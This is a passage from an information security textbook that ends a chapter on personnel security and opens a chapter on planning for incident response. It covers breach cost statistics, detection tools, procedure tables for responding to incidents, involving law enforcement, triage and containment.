Compensation Customer Duties and Responsibilities Warranties and Remedies Security Intellectual Property Rights and Confidential Information Legal Compliance and Resolution of Disputes Termination of Contract Schedules and General Signatures

Note that most regulations including: GDPR, and U.S. regulations: HIPAA, FISMA, Gramm-Leach-Bliley, as well as the PCI DSS standard require that contractors meet these regulations to the same level as the contracting company. These contracts must ensure competence and full adherence to regulation when confidential information is involved. PCI DSS requires that a list is maintained of all such service providers, detailing specific services, and that they are annual monitored for compliance [7]. More information on SLAs can be found on-line at www.service-­level-­agreement.net.

12.5 Questions and Problems 1. Vocabulary. Match each meaning with the correct vocabulary. Security education Security training

Acceptable use policy Change control

Service level agreement Configuration management

(a) A document addressing what, when, where, how and why company data may be accessed. (b) A contract which specifies required standards of service between a customer and provider. (c) Comprehensive training for people whose primary role is security. (d) Security training for a particular role or function. (e) A central repository for document management. (f) A process to track and record modifications to equipment, software or documentation. 2. Segregation of Duties. Consider an industry you currently work in or would like to work in. Draw a Segregation of Duties diagram, similar to Fig. 12.1, for this industry. Include roles and labels for each arrow relationship. Describe in text how segregation of duties is implemented (or not) for this industry. If it is not implemented, describe some options of how it could be, or how compensating controls (mandatory vacations or job rotations) could help. 3. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical

232

12  Organizing Personnel Security

region. You may use the Security Workbook Personnel Security Chapter to complete the tables. For each table, add at least 3–5 entries. (a) Create a ‘Personnel Threats’ Table, similar to Table 12.1. (b) Create a ‘Personnel Controls’ Table, similar to Table 12.2. (c) Create a ‘Responsibility of Security to Roles’ Table, similar to Table 12.3. (d) Create a ‘Requirements for Security Roles: Training and Documentation’ Table, similar to Table 12.5. 4. Security Certifications. Do research on three of the following security certifications: Security+, CISSP, SSCP, HCISSP, CISA, CISM, CRISC and CEH. What does each certification strive to achieve? Develop a table which shows subject areas that each covers. The subject areas can be the chapter topics of this book: Security Awareness/Malware, Fraud, Regulation, Risk, Business Continuity, Security Governance, Information Security/Authentication/Access Control, Network Security/Wireless, Physical Security, Personnel Security, Incident Response, Metrics, Audit, Software/Application Security. You can learn about the certifications by looking at the certification website or a table of contents’ chapter headings of study guide books for each. Do you see differences in expertise between them?

12.5.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Case study Organizing personnel security Update requirements document to include segregation of duties

Health first case study Other resources √ Security workbook HIPAA notes or slides √ Health first Requirements document

References 1. Perlroth (2021) Are we waiting for everyone to get hacked? New York Times. 2. Verizon (2022) Verizon 2022 data breach investigations report. https://www.verizon.com/ business/resources/reports/dbir. 3. Verizon (2013) Verizon 2013 data breach investigations report. http://www. verizonenterprise.com/DBIR/2013. Accessed 20 Oct 2013 4. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 105–106, 117–119 5. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights IL

References

233

6. ACFE (2014) Report to the nations on occupational fraud and abuse: 2014 global fraud study. Association of Certified Fraud Examiners (ACFE) 7. PCI Security Standards Council (2013) Requirements and security assessment procedures, v 3.0, November 2013. www.pcisecuritystandards.org 8. Cammarata C, Wilcox AS (2013) Going mobile. In: SC congress Chicago 9. Gregory P (2008) IT disaster recovery planning for dummies. Wiley Publishing, Inc., Hoboken, pp 158, 257–258, 311–312 10. CIS (2021) CIS Critical Security Controls®, Version 8, May 2021, Center for Internet Security.

Part IV

Planning for Detect, Respond, Recover

While preventive controls are extremely important and are generally prioritized as the most important types of controls, the fact that the average time to identify a data breach is 212 days, with an additional 75 days to contain (in 2021) [22] means that there is plenty of room for improvement in the area of detective and corrective controls. This section focuses on measuring security effectiveness: do the controls work? How well do they work? It also deals with responding to inevitable security incidents. When a security control is implemented, it must be tested for effectiveness. Executing a test plan can ensure that the control functions as planned: for example, a firewall blocks illegal packets. The security system should then be monitored: e.g., how many illegal packets are traversing our internal network? This monitoring over time results in statistics or metrics that are periodically reviewed, and drive new risk analysis evaluations when security is not performing as desired. Finally, external auditors can verify that the security system is designed and managed properly. This section is about designing the review cycle: metrics and audit. Since testing can use the audit plan outline, the section on audit is useful for designing a proper security test plan.

Chapter 13

Planning for Incident Response

We are under attack. But the Presidential Office is still standing. – Dymitro Shymkiv posted on Ukraine’s Administration Facebook after the Russian NotPetya attack took down Ukrainian government and business sites on Ukraine’s independence day, conservatively totaling $10 billion in damages worldwide [1, p. 30]

What should you do? A hacker has penetrated your network and turned a server into a bot. You have a choice of closing the firewall down, closing the inner network down, closing the server down, or keeping everything up. Except the last, each of these might stymie the attacker, but what is it also doing to your organization’s business? If your business is a pharmacy, bringing the network down might make it impossible for customers to get lifesaving prescriptions. Leaving it up might enable the attacker to change multiple prescriptions, potentially killing someone. If your business is a bank, the intruder may walk away with millions of credit card numbers and Social Security numbers. Closing the network down might prevent all banks from operating. Your business could be a search engine, an airline serving thousands of passengers daily, an automated factory producing goods. The decision of how to react to an intrusion is a decision that may impact customer service, customer security, organizational sales, and legal liability. This decision cannot be made lightly, and should be made at the highest levels of the institution  – well before an attack actually occurs. Therefore, it is highly important that top management make strategic decisions about what should happen when an intruder is poking around sensitive organizational data. But this top management should be aware of the full implications of their decision – including business impact, security costs and regulation liability. This issue is called Cyber Resilience. This chapter uses the information developed with the Business Continuity chapter and is expanded upon with the Forensic Analysis chapter. This Incident Response chapter provides an overview of how the business should detect and respond to attacks, whereas the Forensic Analysis chapter covers a more technical analysis and legal preparation perspective.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_13

237

238

13  Planning for Incident Response

13.1 Important Statistics and Concepts An incident is defined as an event that “compromises the confidentiality, integrity, or availability of an information asset” [28, p. 4], whereas a breach is an unauthorized and confirmed disclosure of information. Examples of incidents may include a hacker, fraud or terrorist attack. The difference between Business Continuity and Incident Response is that with Business Continuity, incidents often relate to failed IT systems, whereas with Incident Response, incidents relate to security threats to systems, networks and data, and may be defined as violating an organization’s security policies [29]. Incident response issues may include loss of data confidentiality and non-repudiation. Since a security incident could result in temporary loss of IT, the Incident Response Plan should build upon or be integrated with the Business Continuity Plan, adapted for security threats. So why is it important to plan for security incidents before they actually happen? Why, to save money and reputation, of course! The bad news is that it is REALLY expensive if you experience a data breach. (See Table  13.1, taken from IBM Security’s 2022 Cost of a Data Breach Report [23]). Typical expenses after a data breach include hiring forensic experts to determine the full extent and reason for the breach, and supporting your customers via hotline, free credit monitoring subscription, and discounts for future services [2]. While these costs are expensive, they average only half the cost of customer maintenance after a breach, which includes loss of reputation, abnormal churn of customers, and increased customer procurement activities. Unfortunately, incidents can take a long time to detect and fix. In 2022, IBM reported that the average time to identify a data breach was 207 days, plus an additional 70 days to contain [23]. These numbers are average; even in low years the average time totals over 255 days, offering a identify-and-fix range between 8.5 and 9 months [23]. Sometimes outsiders find the issues, including internet service providers, Information Sharing and Analysis Centers (ISAC) or other organizations, who often recognized communications with known suspicious sites (e.g., an attack is originating from your network) [3]. Therefore, it is highly important to emphasize detective techniques, in addition to preventive techniques, to recognize intrusions and data breaches as early as possible. Table 13.1  Incident response costs: IBM Security’s 2022 cost of a data breach report [23] Expenses following a breach Detection and escalation: forensic investigation, audit, crisis mgmt., board of directors involvement Notification: legal expertise, legal and customer communications Post breach response: help desk and incoming communications, reissuing payment cards, identity protection services, regulatory fines, sale discounts Lost business: lost business due to system downtime, abnormal customer churn, customer procurement, goodwill

Average cost $1.44 million (33%) $0.31 million (7%) $1.18 million (27%) $1.42 million (32.6%)

13.1  Important Statistics and Concepts

239

Some good news is that 78% of the initial intrusions were rated as low difficulty. As the Verizon report states: “Some interpret attack difficulty as synonymous with the skill of the attacker, and while there’s some truth to that, it almost certainly reveals much more about the skill and readiness of the defender” [3, p. 48]. So if you do a good job with planning – and implementing – security, you may have a much lower probability of an incident occurring… but be sure that third party outsourcers and business partners are equally protected, because 40% of data breaches occur due to third party error. IBM’s statistics on breaches indicates the global average cost per breach is $4.87 million when the lifecycle exceeds 200 days; and $3.61 otherwise [22]. With good preparation, you can encounter lower costs if a breach occurs. The IBM Security’s Cost of Data Breach 2021 [22] found that you can reduce the total data breach cost if your organization has an incident response team and performs testing (reduces by: $2.46 million), a strong emphasis on regulatory compliance ($2.3 million), a mature implementation of zero trust ($1.76 million), a high standard of encryption ($1.25 million), and security automation ($3.81 million, with a good reduction in time to find and contain the incident). Additional positive factors with an impact over a million dollars per breach included use of artificial intelligence, and security analytics. Factors raising the cost of a breach to above a $5 million average included a high level of cloud migration, and a large majority (81–100%) of employees working remotely; working remotely also caused a longer delay in discovering and containing the breach. The Incident Management Team (IMT) is the managerial team that designs the Incident Response Plan (IRP) [4]. The Information Security manager works with business management to prepare the IRP. Together, they strategize over how various security incidents should be handled and how incidents should affect business, IT, business continuity and risk management. The Information Security manager leads this team, which in a larger organization includes members from the Security Steering Committee and Incident Response Team. This management team also discusses budgets, evaluates schedules and performance, and reviews incident postmortem reports. The Incident Response Team (IRT) is a technical team that handles the specific incident [4]. This team has technical knowledge relating to security, network protocols, operating systems, physical security issues, and malware. (This topic is substantially introduced in the Forensic Analysis chapter.) While these incident handlers and (if possible) investigators are the main members of the team, representatives from business management, legal, public relations, human resources, physical security, risk and IT also have important roles relating to their expertise, following an incident. Although the IMT and IRT functions may differ, in actuality both teams may overlap considerably in personnel.  In smaller organizations, security and/or forensic expertise may not be available in house. In this case, the function must be outsourced using a qualified security/forensic organization, that is preferably local. For incident response purposes, external consultants will need full and timely Internet and physical access for their investigation, and will make quicker progress if internal technical staff is there to help [5].

240

13  Planning for Incident Response

Attacks by criminals may end up in court. Meaningful forensic data (‘artifacts’) must be authentic, pertinent and unaltered. Artifacts become evidence when presented in court [30]. Major authenticity concerns include that any information obtained has not been altered by criminals; and that evidence is not modified before being presented in court. One problem is that criminals may delete incriminating logs or modify the system to lie about running processes and users, using a rootkit. Chain of custody addresses the second issue of ensuring that evidence is not altered before court. Chain of custody must be introduced at the start of evidence collection, and maintained throughout the forensic process.

13.2 Developing an Incident Response Plan An Incident Response Plan (IRP) addresses each stage of incident response. The stages of incident response [4, 6] are shown in Fig. 13.1. The first stage is Preparation, where the Incident Response Plan is developed and preparation to further protect is implemented. This occurs BEFORE any incident occurs (hopefully). An incident triggers the Identification Stage. An employee may recognize a social engineering event, a system administrator may recognize an attack in system logs, or an intrusion detection device may recognize an attack signature. Once the attack is recognized, it is important to contain the incident: the intruder should not be able to expand the attack or do more damage. Defensive actions may include disconnecting or bringing down the application, system, and/or network, or modifying firewall access control to reject the connection (which will only delay further attacks). In the Analysis and Eradication Stage, the root cause of the attack is determined and attack software is recognized and removed from the network. After testing ensures the rebuilt system is ready for operation, the Recovery Stage brings the system back on-line again. If a data breach occurred, two additional stages are added: Notification

Fig. 13.1  Stages of incident response

13.2  Developing an Incident Response Plan

241

and Ex-Post Response, which is where we notify victims and offer redress. The Lessons Learned Stage reviews how the organization did as part of incident response, and how the procedures could be made clearer, faster and more effective. The next sections elaborate on each of these stages in detail, to help in planning for incident response.

13.2.1 Step 1: Preparation Stage The purpose of the Incident Response Plan (IRP) is to decide in advance [4, 5]: • Strategy: How will we detect incidents? What shall we do to prevent or discourage incidents from occurring (e.g. policies and warning banners at computer logon)? • Containment: What should we do when different types of incidents occur? The BIA can help in determining critical assets and how incidents can be handled. When can the IRT confiscate or disconnect an employee’s computer? If we call law enforcement, what actions do they recommend us take before they arrive? • Escalation: When is the incident management team called? How can governmental agencies or law enforcement help? When do we involve law enforcement, who do we contact, how soon will they respond, and what should we expect? • Preparation: What equipment do we need to handle an incident? Where on-site and off-site shall we keep the IRP? Security threats that should be considered include: malware, unknown or unauthorized user, compromised server, lost or stolen equipment, divulged secrets/files, (distributed) denial of service, written threats to IT, unidentified network objects (e.g., wireless, hosts), and modified information [5, 7]. Attack vectors (or source methods) may include removable media, flash drive, email, web, improper use, loss or theft, physical abuse, social engineering, etc. To detect an incident, an organization must have detection and monitoring capabilities. The sooner the attacker can be found, the more limited the scope of the attack will be. Proactive detection mechanisms include [4, 5, 7, 26]: • Antivirus software: Detects malware infections and may fix some infections. Antivirus is helpful in user terminals and in a centralized email server. –– Endpoint Security Suite: Enterprise-level software includes antivirus/antispyware software and firewalls, but in addition verifies that operating system software is recently updated, and that only permitted (or allowlisted) applications are installed or forbidden software is not installed [8]. This software sends alerts or emails to a centralized system when problems are detected. –– Email Server: Antivirus within the email server helps to reduce social engineering and malware attacks.

242

13  Planning for Incident Response

• System baseline: A listing of normal terminal configurations, including active processes and communications, can help to distinguish abnormal or suspicious configurations. This normal configuration is saved as a system baseline for future comparisons against suspicious computers. • Log management: Log management is required as part of comprehensive security regulations (e.g., HIPAA, FISMA, PCI DSS). It is important to consider which computer logs will best help to detect and analyze an attack, and how much storage is needed for this. Since it is important to correlate logs between different network and computer equipment, the Network Time Protocol ensures the network agrees on a precise time. Log management requires extensive time and technical expertise. For larger organizations, a SIEM tool collects system logs network-wide, coordinates and co-relates logs, and tracks the status of incidents to closure. See Fig. 13.2 for important logs to collect. • Vulnerability testing: Periodic automated or manual testing ensures that servers and network equipment are configured to withstand common attacks, including that servers are patched, security configuration options are adequate. PCI DSS requires quarterly testing. It is recommended that vulnerability tests are automatically run daily, with results compared with known good results [8]. • Protocol sniffer: These tools record and decipher packets traveling across the network. A professional knowledgeable about network protocols will be able to inspect and search through packets, when an incident is suspected. Use of artificial intelligence or inspecting 3 h of unusual traffic per week may discover an intrusion [8]. • Intrusion detection/prevention systems: Network Intrusion Detection/ Prevention Systems (NIDS/NIPS) and Host Intrusion Detection/Prevention Systems (HIDS/HIPS) automatically recognize attack signatures and abnormalities. These tools are often configured to recognize exfiltration, the copying of sensitive data, unauthorized accounts, and unusual patterns of data access.

Security

Authent.

Network

Config

Failures

Irregularity

Log Issues

Normal Events

Software App

Changes to security configurations

Unauthorized acceses

Unusual packets (IP, port, login)

Deleted logs

Logins, logoffs

Attacks: SQL injection, invalid input, DDOS, cross site scripting

Changes to network device configurations

Unapproved accounts

Blocked packets

Overflowing log files

Access to sensitive data(e.g., medical, payment card)

Others, as listed in previous columns

Changes in privileges

Lockouts and expired password accounts

Transfer of sensitive or unusual data

Clearing or changes to log configuration

Changes to secured files: system code/data

Unsuccessful login attempts

Changes in traffic patterns

All actions by administrators

Simple passords or single factor authentication

System crashes

Fig. 13.2  Important logs to collect [8, 9, 26]

Unapproved applications

13.2  Developing an Incident Response Plan

243

Slower but effective mechanisms include human (employee, customer, vendor) report of unusual or suspicious activity. For this to be an effective means of incident detection, security awareness training should educate employees to recognize attack symptoms and tell them how to report an incident that they personally observe or hear from customers or vendors. There needs to be a way for people to submit incidents anonymously [5]. Symptoms that should be investigated by IT professionals include: a device (firewall, router or server) issues one or more serious alarms, an intrusion detection system recognizes an irregular pattern (e.g., unusually high traffic, inappropriate file transfer, changes in communications protocol use), and unexplained system crashes or connection terminations. Even if an IDS is not available, heavy usage through firewall or at server should be a concern. Finally, when reported network or computer activity does not match actual activity, a hidden rootkit can explain the discrepancy [7]. Events that employees should report include [10, 26]: • Malware: includes ransomware, keyloggers, RAM scrapers, suspicious emails, or antivirus software reports malware. “Simple” viruses may result in criminal escalation that includes backdoor entry, data copying, and additional attacks on other computers. • Violations of policy: includes unauthorized access or changes to IT equipment, information, and services. This includes use of computers for gambling, pornography, illegal downloads, inappropriate use of email, as well as industry or organization-­specific violations of policy. • Data breach: includes unauthorized access to information, stolen laptop or backup memory, or employee mistake: an inadvertent data breach may occur via email or unprotected shared data files. • Social engineering/fraud: includes suspicious transactions or attempts by callers, e-mailers, or visitors to obtain information or service fraudulently; and fraud-­ related complaints from customers, vendors. • Denial of service: includes distributed denial of service attacks. • Physical disruption: IT equipment may be threatened or accessed in inappropriate ways. • Surveillance or espionage: includes stealing proprietary, government or trade secret information. • Attack to software: A program reports an attack that does not qualify elsewhere. • Unusual/suspicious event: an employee recognizes an inappropriate login, a system aborts without good cause, a server seems unusually slow (DOS?), files get deleted, or the website is defaced. Detection tools and implementations cost money. Executive management must be convinced that this money is well spent. Hopefully, Table 13.1 and statistics in the Risk chapter will help to inform management of the true costs of a data breach. In addition to detection tools, redundant configurations including redundant computers or alternative routing may carry part of the load following an incident, after infiltrated equipment is removed.

13  Planning for Incident Response

244

Table 13.2 documents methods of detection and procedural responses for various types of incidents. The social engineering and theft events include brief descriptions of how the incidents should be handled. The ‘Intruder accesses internal network’ event is more complex and cannot be fully described in the Procedural Response section. Should the network/server be brought off-line? The technician selected to handle the intrusion could depend on the type of alarm generated, and the priority Table 13.2  High-level planning for incident detection and handling (workbook exercise) Procedural response (In all cases an incident report is written) IT/security addresses incident within 1 h to prepare investigative plan; if confidential/proprietary servers involved, follow breach protocol Email/call security if memory contains confidential information immediately. Security initiates tracing of laptops via location software, writes incident report, evaluates if breach occurred. Management calls police, if computer theft Training of staff leads Report to management & to report from staff to IT security Warn employees of attempt as added training Security evaluates if breach occurred, writes incident report

Methods of detection (In all cases: warning banner) Incident Description Unusual network traffic Firewall, database, Intruder observed via NIDS or IDS, or server log accesses firewall logs (in type or indicates a probable internal intrusion. (May qualify quantity). Daily log network evaluations, high as espionage) priority email alerts Break-in, loss A laptop, backup tape, Security alarm set for off-hours; or employee or theft or memory source reports missing device with confidential information was lost or stolen

Social engineering

DDOS

Suspicious social engineering attempt was recognized OR information was divulged that was recognized after the fact as being inappropriate Server or network approaches 85% or higher utilization

Trojan A new WLAN wireless LAN masquerades as us

Security alarm set when threshold is reached; investigate rate of successful transactions; sniff network traffic to determine if traffic appears legal or not Key confidential areas are inspected daily for WLAN availability

Reject offending source IP addresses at firewall Notify internet service provider After 2 h, contact security company handling DDOS attacks Security or network administrator is notified immediately. Employees in affected area are warned of an attack, first electronically, then with an office visit. Incident is acted upon within 2 h (continued)

13.2  Developing an Incident Response Plan

245

Table 13.2 (continued)

Incident Data breach

Violation of policy

Malware

Ransomware

Surveillance/ espionage

Methods of detection (In all cases: warning banner) Description Inappropriate access to Preventive: two-factor authentication; proprietary or restricted hours, confidential devices, location for information personnel; Detective: Zero trust alarms when volume of records accessed exceeds threshold

Violation of organizational standards and rules: Unauthorized access or changes to IT, information, or service Antivirus software reports malware, and whether it can be automatically cleaned; Employee reports unusual behavior Criminals infiltrate and encrypt our servers, ask for ransom to decrypt and not publish data An external party infiltrates the organization in order to steal proprietary information

Host IPS detects unauthorized access; Unusual logs or inappropriate access by IP/MAC address; Excessive access to data Anti-virus or employee reports unusual behavior or antivirus report

Procedural response (In all cases an incident report is written) Investigate zero trust volume alarm as first priority (within 15 min) Take memory and network image of affected devices Close down confidential/ proprietary network to contain incident Notify of disaster to business to initiate BC plan Complete forensic collection Follow compromised payment card incident handling response procedure, (Table) 13.3 if appropriate Remove permissions; Discuss with employee’s management

If employee-reported, run second antivirus to check status Follow detected malware incident handling response procedure (Table) 13.4 Weekly full backups Monthly offline maintained off-site. monitoring of recent backups to ensure data Documented procedure to looks normal and stable save off, reload, and test backups Follow data breach protocol Confirmed via above protocol: Data Breach above or Intruder Accesses Internal Network

246

13  Planning for Incident Response

of the event depends on the type of alarm. Therefore, the incident itself may be further divided into a number of incidents. Because this incident’s Procedural Response is lengthy, this table entry simply refers to a procedure. This extended procedure is divided into sections by incident stage: Identification, Containment, Analysis, etc., and a sample is demonstrated later, as shown in Tables 13.3 and 13.4. In addition to having an incident response plan, each organization shall have an incident response form. Fields that may be included in such a form include: date/ time the incident was detected, date/time the incident occurred, contact info for the reporting person, reported suspicious observation, the incident type, affected systems and applications, impacted accounts, any police report, and all incident details, summary, and observation snapshots as noted by the incident response team [7]. 13.2.1.1 Bringing in the Law There are advantages to calling in law enforcement [27]. One is that this is a necessary step to catching criminals. If criminals can hack and ransom one organization after another and no one reports them, then criminals are only encouraged. Secondly, it can be difficult to chase after national or international criminals and win a court Table 13.3  Incident handling response procedure: compromise payment card (workbook exercise) Incident type: Handling of compromised payment card data Contact name and information: Computer technology services desk: 262-252-3344(O) Emergency triage procedure: Disconnect computer from internet/WLAN. Do not reconnect. Do not login to the compromised machine(s) or change password on it/them Escalation conditions and steps: Inform management within 2 h; they contact legal department Inform acquiring bank within 24 h Provide MasterCard information within 24 h; contact is at account_data_compromise@ mastercard.com Provide Visa’s incident report within 3 days to regional risk center; find contact at [email protected] Containment, Analysis & Eradication Procedure: (assumes independent investigation by capable staff; otherwise PCI forensic investigator is called) Identify all compromised devices and systems (e.g., servers, terminals, databases, logs) Document all containment and remediation actions taken, including date/times, names, actions Preserve all evidence, including images and logs from all compromised and non-compromised devices. Expect to provide this evidence to PCI forensic analysts, if/when necessary. Prepare incident report within 24 h to bank, MasterCard; 3 days to visa with incident response form Other notes (prevention techniques): MasterCard reference documentation is: Mastercard account data compromise user guide [26] Visa reference documentation is: What to do if compromised [32] Some secure practices are provided in other sections of this security plan; additional forensic detail is required

13.2  Developing an Incident Response Plan

247

Table 13.4  Incident handling response procedure: detected malware (workbook exercise) Incident type: Malware detected by antivirus software Contact name and information: Computer technology services desk: 262-252-3344(O) Emergency triage procedure: Disconnect computer from internet/WLAN. Do not reconnect. Allow antivirus to fix problem, if possible. Report to IT first thing during (next) business day Escalation conditions and steps: If laptop contained confidential information, investigate malware to determine if intruder obtained entry. Determine if breach law applies Containment, Analysis and Eradication Procedure: Run two versions of antivirus software to determine status. Security investigates problem through CVE analysis, as provided by antivirus reports If confidential information was on the computer (even though encrypted), malware may have sent sensitive data across the internet; encryption was ineffective and breach law may apply. A forensic investigation is required Clean disk. If virus was dangerous and if user had admin (or install) privileges:   Type A: Return computer. (A = malware not dangerous and user not admin)   Type B: Rebuild computer. (B = either malware was dangerous and/or user was admin) Password is changed for all users on the computer. Confirm security settings before returning machine to owner Other notes (prevention techniques): Note: Antivirus should record type of malware to log system

case, and law enforcement has the connections, training, advanced forensic tools and legal abilities to analyze and preserve evidence in correct ways to assure admissibility into court. Finally, current attackers and other criminals are deterred from further attacking that organization. For purposes of prosecuting crimes, it is important to clearly warn users at login who is allowed to login to that system and for what purposes. This warning banner should also indicate that communications may be monitored, so there is no question of the organization’s intention to monitor for cyberattacks [27]. Law enforcement recognizes that businesses cannot afford to shut down for an investigation and are sensitive to negative publicity. Therefore, to retain goodwill, there is a delicate balance between accessing evidence and resuming business [27]. It is a priority for law enforcement to copy images but not disrupt business by taking important business servers. Law enforcement and the organization should coordinate their public announcements, to minimize negative publicity to the business and minimize release of damaging information relating to the investigation. If arrests are made, law enforcement should notify the organization of all court proceedings and dates. To enable trust, it is important for law enforcement to establish relationships before an incident, and explain what would happen during an investigation. Law enforcement has a policy to recognize that investigations on organization’s computers are best accessed with approval from senior management, in combination with their legal representation. System administration is knowledgeable, but cannot make decisions on business operations.

248

13  Planning for Incident Response

It is important for organizations to decide the specific conditions when law enforcement is called. When law enforcement is called, it is best not to modify the configuration or stored data for the integrity of the evidence. However, it is possible to contain the attack, by filtering out attack source IPs and isolating attacked computer systems, while documenting who did what when and (eventually) its financial impact for cost recovery purposes [27]. As soon as criminal activity is suspected, it is important to contact law enforcement. It is never a good idea to attack back, because that only breaks hacking laws (potentially on other innocent organization computers). Law enforcement also recommends taking the initial configuration in memory, as outlined in the chapter on Forensics: Authentic Volatile Information. When initiating an investigation, law enforcement will require the network architecture from system administration, including network topology, software with versions, and proprietary software. Important log information includes what is logged, where it is logged, and how full current log files are.

13.2.2 Step 2: Identification Stage Often the first indication of an intruder may be that a file or logs are created, accessed or deleted, or accounts or permissions have been added, modified, or deleted [27]. Law enforcement suggests evaluating log information to determine: where the attack originated from; which servers did the attackers access; and which other users were affected. An incident has been reported and it is necessary to look into it. It could be a real problem or a false positive (i.e., looks threatening but is ok). The questions that need to be answered during the Identification Stage is: What type of incident just occurred? What is the severity of the incident? Who should be called? The severity may increase if recovery is delayed. When an incident is suspected, the appropriate incident response person should be called immediately to determine whether the cause for concern is real or a false positive. This and other incident response team members will need written permissions in policy to access and monitor accounts. This elevated permission may be kept in secured storage for security incidents [7]. Time will be critical when an incident occurs, and many things can happen simultaneously. A DDOS attack can hide a more serious attack, such as a ransomware breach [31]. Triage is the function of naming and categorizing the incident, prioritizing it, and assigning the handling of the incident to an appropriate handler. In a hospital, triage is what they do in at the emergency room front desk to stop the bleeding, write a preliminary report, prioritize patients, and schedule the right doctor (according to how quickly people are dying). Decisions that are to be made include what must be handled right away, what can be efficiently addressed by a nurse, what can’t be addressed and what can wait? Triage for a network attack may be for the firewall to disconnect problem connection(s) and notify the network administrator via a high-priority alarm that a certain type of attack is underway. The IRT has a preconfigured jumpkit with all tools, including forensic software utilities,

13.2  Developing an Incident Response Plan

249

to investigate the incident. All communications about the incident should be off-net, using cell phones or external email accounts, to combat any listening attacker [7]. The full set of functions during this stage include: Sort, Categorize, Correlate, Prioritize and Assign [4]. Sorting may be important when multiple events occur simultaneously as part one or more incident(s). Documenting a snapshot of the known status of all reported incident activity is important to properly identify and categorize the event. This documentation will also be important in later Analysis stages and to establish a chain of custody for evidence. Categories for attacks may include: DoS, malicious code, unauthorized access, inappropriate usage, or a combination of components. Prioritization is important when there is limited time and staff. Higher priority should be allocated to services at higher class levels for confidentiality, integrity, and/or availability [5], as defined by Business Continuity and Information Security sections. However, once Containment is completed, priorities may change. Assignment of staff may consider who is free or on duty, and who is competent in this area. Evidence must follow Chain of Custody law to be admissible in court [4]. If the incident may ever be prosecuted, chain of custody must start immediately and proceed through this and all subsequent stages. This includes documenting all actions, including when they were performed and preferably working with a witness and avoiding modifying evidence. This is best tracked in a joint or separate files [31]. Most technical people do not know what they can and cannot do in evidence handling. If prosecution is to remain an option, it is important to employ specially trained staff as soon as possible, such as calling an outside forensic expert and legal counsel, law enforcement, or your own security response team. In the case of a data breach, the advantage of hiring outside legal council is the attorney-client privilege, but eventually you will need to notify customers, and in the U.S., possibly the Attorney General or a state authority [11]. In Europe, you may need to report the breach within 72 hours, as part of following the GDPR [25]. If law enforcement is called, the typical FBI response to a threat involves interviewing key personnel, isolating compromised systems, performing live response, creating forensic images, and copying related logs and relevant evidence. They will leave your equipment in tact as much as possible. They need to be notified as soon as possible, and are willing to deal with some false alarms [12]. Regardless of whether your organization decides to hire consultants, bring in law enforcement, and/or do much of the forensic work yourself, evidence collection is very tricky work. It is further described in the Forensics chapter. However, it is also important to react quickly to minimize damage. Even when law enforcement will be called, system administrators can retrieve information to identify an incident, determine the scope and size of the impacted environment (system/network), establish the degree of loss or damage, and uncover the possible path of attack [4]. While it is important to clearly identify the incident, it can be a good idea to begin to contain the incident, even if the incident is not yet fully identified.

250

13  Planning for Incident Response

13.2.3 Step 3: Containment and Escalation Stage In this stage, the Incident Response Team is tasked with containing the threat. During Containment, the problem is isolated so the attacker becomes confined and controlled. Containment options may include [7, 10, 26]: • Image affected devices: To avoid actions that could destroy information useful in a forensic analysis, copy volatile memory from all affected devices, before changing the network configuration. (MasterCard recommends that their PCI Forensic Investigators do this step first.) • Halting connections: Disconnect attacker by reconfiguring firewalls or routers to not service particular IP addresses or port numbers. This is a temporary fix, since most attackers can easily change their IP address. The Internet Service Provider may be able to help in filtering an attack pattern. • Disabling server communications or network zone: Disconnect the computer or server from the network by effectively removing or disabling the Network Interface Card (NIC) from the infiltrated machine. It is also possible to break access to a zone or router region, by disconnecting network connections or powering down routers. Alternatively, safely power down a server or virtual machine. • Disabling user access: Revoke privileges to internal users who violate policy; change passwords; enable two-factor authentication; prohibit an executable. Management actions may include scolding, additional training or termination. • Alert related entities: Organizations whose data or systems may be affected including financial or payment card, and internet service provider; they can help to contain the attack. • Continue to monitor: Closely monitor any continued progress in the attack • Patch vulnerable software: After obtaining images of all affected machines, it may be useful to patch vulnerable software, if vulnerabilities have been detected. It is never appropriate to attack the attacker. This usually violates law and can escalate the confrontation. Technical staff will need to collect system data and analyze this data and log files. They may require additional technical assistance from other staff. To further contain the incident, they may deploy patches and workarounds. The attack itself or disabled service may affect other parts of the business. Management will need to be notified of the attack and any implications, such as temporarily unavailable services. Finally, if the incident is ever to go to court, the forensic staff must continue to obtain and preserve evidence according to strict legal rules. Escalation is required for certain attacks, such as data breaches. During escalation authorities are notified, such as the incident management team, executive management, board of directors, and possibly law enforcement [6]. Legal counsel should advise on issues related to investigation, prosecution, liability, privacy, regulation and nondisclosure. Forensic experts may be hired to investigate a breach. An incident is likely to be chaotic [31]. At its worst, C-level management may swoop in and interfere by micromanaging. They must be trained in how to react during such an event. It may be wise to have a public relations person on retainer for when such events occur.

13.2  Developing an Incident Response Plan

251

13.2.4 Step 4: Analysis and Eradication Stage The intruder found some way to initially gain entrance into the network, and could do it again if this entry is not repaired. In addition, they most likely installed new backdoors into infiltrated systems. Therefore, the main function of the Analysis stage is to determine the root cause of the incident. This means analyzing the vulnerabilities that enabled the attack and why those vulnerabilities existed. To determine the root cause, it is important to start to understand what damage occurred and why. Computer Emergency Response Team (CERT) centers gather basic statistics per incident, including [3]: • • • •

Actors: Who perpetrated the incident? Assets: Which assets (equipment, data) were affected? Actions: What happened during this incident? Attributes: How were the assets affected?

